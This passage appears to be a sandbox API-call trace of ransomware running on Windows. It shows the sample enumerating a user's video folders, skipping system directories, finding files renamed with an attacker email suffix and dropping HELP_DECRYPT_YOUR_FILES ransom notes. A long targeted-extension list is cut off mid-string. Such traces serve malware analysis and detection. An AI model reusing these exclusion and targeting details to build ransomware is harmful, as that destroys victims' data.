	[0201.535] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="programdata") returned 0x0
	[0201.535] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0201.535] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0201.535] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x187a54 | out: lpFindFileData=0x187a54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18f3e1c0, ftCreationTime.dwHighDateTime=0x1d973a3, ftLastAccessTime.dwLowDateTime=0x919ebc00, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x91a12080, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="..", cAlternateFileName="")) returned 1
	[0201.535] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0201.535] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x187a54 | out: lpFindFileData=0x187a54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9199f9a2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x9199f9a2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x9199f9a2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xb2e0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="-n18j7bg2ynzdb7gc.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="-N18J7~1.SCL")) returned 1
	[0201.535] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x187a54 | out: lpFindFileData=0x187a54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x919ebc00, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x919ebc00, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x919ebc00, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x9340, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="cl1o0yrs a.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="CL1O0Y~1.SCL")) returned 1
	[0201.535] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x187a54 | out: lpFindFileData=0x187a54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91a12080, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x91a12080, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x91a5e490, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0201.535] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x187a54 | out: lpFindFileData=0x187a54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91a12080, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x91a12080, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x91a12080, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0201.536] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x187a54 | out: lpFindFileData=0x187a54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x869921c0, ftCreationTime.dwHighDateTime=0x1d971a7, ftLastAccessTime.dwLowDateTime=0xd654b460, ftLastAccessTime.dwHighDateTime=0x1d972db, ftLastWriteTime.dwLowDateTime=0xd654b460, ftLastWriteTime.dwHighDateTime=0x1d972db, nFileSizeHigh=0x0, nFileSizeLow=0x2b83, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="ij1_ g0KO.avi", cAlternateFileName="IJ1_G0~1.AVI")) returned 1
	[0201.536] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x187a54 | out: lpFindFileData=0x187a54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x869921c0, ftCreationTime.dwHighDateTime=0x1d971a7, ftLastAccessTime.dwLowDateTime=0xd654b460, ftLastAccessTime.dwHighDateTime=0x1d972db, ftLastWriteTime.dwLowDateTime=0xd654b460, ftLastWriteTime.dwHighDateTime=0x1d972db, nFileSizeHigh=0x0, nFileSizeLow=0x2b83, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="ij1_ g0KO.avi", cAlternateFileName="IJ1_G0~1.AVI")) returned 0
	[0201.536] FindClose (in: hFindFile=0xfb95f0 | out: hFindFile=0xfb95f0) returned 1
	[0201.536] FindClose (in: hFindFile=0xfb95f0 | out: hFindFile=0xfb95f0) returned 0
	[0201.536] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6814550, ftCreationTime.dwHighDateTime=0x1d97619, ftLastAccessTime.dwLowDateTime=0x8afa0320, ftLastAccessTime.dwHighDateTime=0x1d97642, ftLastWriteTime.dwLowDateTime=0x8afa0320, ftLastWriteTime.dwHighDateTime=0x1d97642, nFileSizeHigh=0x0, nFileSizeLow=0xc615, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="Ct2vYov-inyodole.avi", cAlternateFileName="CT2VYO~1.AVI")) returned 1
	[0201.536] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x918e0dfc, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x918e0dfc, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x91906dde, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0201.537] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x918e0dfc, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x918e0dfc, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x918e0dfc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0201.537] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x918baf4d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x918baf4d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x918baf4d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x9580, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="vuzp5x 8.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="VUZP5X~1.SCL")) returned 1
	[0201.537] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x918baf4d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x918baf4d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x918baf4d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x9580, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="vuzp5x 8.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="VUZP5X~1.SCL")) returned 0
	[0201.537] FindClose (in: hFindFile=0xfb8f30 | out: hFindFile=0xfb8f30) returned 1
	[0201.537] FindClose (in: hFindFile=0xfb8f30 | out: hFindFile=0xfb8f30) returned 0
	[0201.537] FindNextFileW (in: hFindFile=0xfb93f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50faa8e0, ftCreationTime.dwHighDateTime=0x1d974fe, ftLastAccessTime.dwLowDateTime=0x103ef9c0, ftLastAccessTime.dwHighDateTime=0x1d97501, ftLastWriteTime.dwLowDateTime=0x103ef9c0, ftLastWriteTime.dwHighDateTime=0x1d97501, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="wu9RMPx3T2rmzF3qVbg", cAlternateFileName="WU9RMP~1")) returned 0
	[0201.538] FindClose (in: hFindFile=0xfb93f0 | out: hFindFile=0xfb93f0) returned 1
	[0201.538] FindClose (in: hFindFile=0xfb93f0 | out: hFindFile=0xfb93f0) returned 0
	[0201.538] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbca4920, ftCreationTime.dwHighDateTime=0x1d973ea, ftLastAccessTime.dwLowDateTime=0x6fba25d0, ftLastAccessTime.dwHighDateTime=0x1d9764d, ftLastWriteTime.dwLowDateTime=0x6fba25d0, ftLastWriteTime.dwHighDateTime=0x1d9764d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KcTv Nkg6", cAlternateFileName="KCTVNK~1")) returned 0
	[0201.538] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0201.538] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0201.539] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20d74b10, ftCreationTime.dwHighDateTime=0x1d970a7, ftLastAccessTime.dwLowDateTime=0xcf0dd8f0, ftLastAccessTime.dwHighDateTime=0x1d97405, ftLastWriteTime.dwLowDateTime=0xcf0dd8f0, ftLastWriteTime.dwHighDateTime=0x1d97405, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="a-_m2", cAlternateFileName="")) returned 1
	[0201.539] lstrcmpW (lpString1="a-_m2", lpString2="..") returned 1
	[0201.539] lstrcmpW (lpString1="a-_m2", lpString2=".") returned 1
	[0201.539] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT"
	[0201.539] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\"
	[0201.539] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\", lpString2="a-_m2" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2"
	[0201.539] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2"
	[0201.540] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\"
	[0201.540] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\"
	[0201.540] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\*.*"
	[0201.540] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20d74b10, ftCreationTime.dwHighDateTime=0x1d970a7, ftLastAccessTime.dwLowDateTime=0xcf0dd8f0, ftLastAccessTime.dwHighDateTime=0x1d97405, ftLastWriteTime.dwLowDateTime=0xcf0dd8f0, ftLastWriteTime.dwHighDateTime=0x1d97405, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0201.540] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\*.*") returned 78
	[0201.540] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0201.540] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\*.*", cchLength=0x4e | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*") returned 0x4e
	[0201.541] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.541] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="windows") returned 0x0
	[0201.541] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.541] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="boot") returned 0x0
	[0201.541] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.541] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="system volume information") returned 0x0
	[0201.541] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.542] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0201.542] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.542] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="temp") returned 0x0
	[0201.542] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.542] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="program files") returned 0x0
	[0201.542] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.542] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="program files (x86)") returned 0x0
	[0201.542] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.543] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="appdata") returned 0x0
	[0201.543] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.543] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="application data") returned 0x0
	[0201.543] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.543] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="winnt") returned 0x0
	[0201.543] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.543] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="tmp") returned 0x0
	[0201.543] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.544] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="cache") returned 0x0
	[0201.544] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.544] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="temporary internet files") returned 0x0
	[0201.544] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.544] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="webcache") returned 0x0
	[0201.544] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.544] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="inetcache") returned 0x0
	[0201.545] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.545] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="nvidia") returned 0x0
	[0201.545] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.545] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="packages") returned 0x0
	[0201.545] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.545] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="cookies") returned 0x0
	[0201.545] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.546] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="programdata") returned 0x0
	[0201.546] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20d74b10, ftCreationTime.dwHighDateTime=0x1d970a7, ftLastAccessTime.dwLowDateTime=0xcf0dd8f0, ftLastAccessTime.dwHighDateTime=0x1d97405, ftLastWriteTime.dwLowDateTime=0xcf0dd8f0, ftLastWriteTime.dwHighDateTime=0x1d97405, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0201.546] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20bd9ae0, ftCreationTime.dwHighDateTime=0x1d96fde, ftLastAccessTime.dwLowDateTime=0x7601e580, ftLastAccessTime.dwHighDateTime=0x1d9731a, ftLastWriteTime.dwLowDateTime=0x7601e580, ftLastWriteTime.dwHighDateTime=0x1d9731a, nFileSizeHigh=0x0, nFileSizeLow=0x4587, dwReserved0=0x0, dwReserved1=0x0, cFileName="1nnJaIktbaOED3Bu.swf", cAlternateFileName="1NNJAI~1.SWF")) returned 1
	[0201.546] lstrcmpW (lpString1="1nnJaIktbaOED3Bu.swf", lpString2="..") returned 1
	[0201.546] lstrcmpW (lpString1="1nnJaIktbaOED3Bu.swf", lpString2=".") returned 1
	[0201.546] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\"
	[0201.546] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\", lpString2="1nnJaIktbaOED3Bu.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\1nnJaIktbaOED3Bu.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\1nnJaIktbaOED3Bu.swf"
	[0201.546] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\1nnJaIktbaOED3Bu.swf") returned 95
	[0201.546] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0201.547] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\1nnJaIktbaOED3Bu.swf", cchLength=0x5f | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\1nnjaiktbaoed3bu.swf") returned 0x5f
	[0201.547] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.547] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\1nnjaiktbaoed3bu.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0201.547] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\1nnjaiktbaoed3bu.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\1nnjaiktbaoed3bu.swf") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\1nnjaiktbaoed3bu.swf"
	[0201.547] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\1nnjaiktbaoed3bu.swf") returned 95
	[0201.547] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.547] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.548] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0201.548] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.548] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.e